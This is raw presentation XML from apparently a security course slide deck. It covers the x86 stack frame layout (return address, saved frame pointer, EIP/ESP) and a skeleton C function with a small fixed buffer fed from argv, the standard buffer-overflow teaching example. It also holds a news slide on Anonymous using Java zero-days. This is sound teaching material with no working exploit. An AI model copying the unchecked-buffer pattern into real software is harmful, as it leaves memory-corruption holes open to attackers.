            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>buf2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>var1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>saved frame pointer (SFP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>return address (ret)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>*buf (function's argument)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main()'s stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="356" name="Shape 356"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754739" y="6295550"/>
            <a:ext cx="1448100" cy="354000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>[high memory]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357" name="Shape 357"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754739" y="1571150"/>
            <a:ext cx="1448100" cy="354000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>[low memory]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="358" name="Shape 358"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="356" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5457489" y="2263550"/>
            <a:ext cx="21300" cy="4032000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="76200">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="stealth"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="Shape 359"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5427486">
            <a:off x="4285517" y="4253112"/>
            <a:ext cx="2138768" cy="550518"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>growth direction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="360" name="Shape 360"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2261475" y="3742700"/>
            <a:ext cx="2238600" cy="323100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$EIP is here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="361" name="Shape 361"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="360" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1686075" y="3904250"/>
            <a:ext cx="575400" cy="19800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="362" name="Shape 362"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8205050" y="2513000"/>
            <a:ext cx="882900" cy="307500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$ESP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="363" name="Shape 363"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="362" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7992350" y="2666750"/>
            <a:ext cx="212700" cy="39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More news...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Shape 114"/>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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Anonymous attacking US govt over Aaron Schwartz's death</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>	used many *recent* java 0 days, and other exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>	+ insider threats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.youtube.com/watch?v=WaPni5O2YyI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="36666"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>There's always the debate than when Anon claims to do something, if it is actually Anon...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="36666"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>works both for and against them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lv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x86 Stack Details</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="Shape 369"/>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b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Many debuggers display the stack this way:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(the HAOE book also does it this way)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>int function(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>char *buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>int var1 = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>  char buf2[4];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  // some code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>return auth_flag;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>int main(int argc, char *argv[]){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  if(function(argv[1]) )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="387350" lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>	  // do something</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="370" name="Shape 370"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5941969" y="1757700"/>
            <a:ext cx="2050200" cy="4770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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
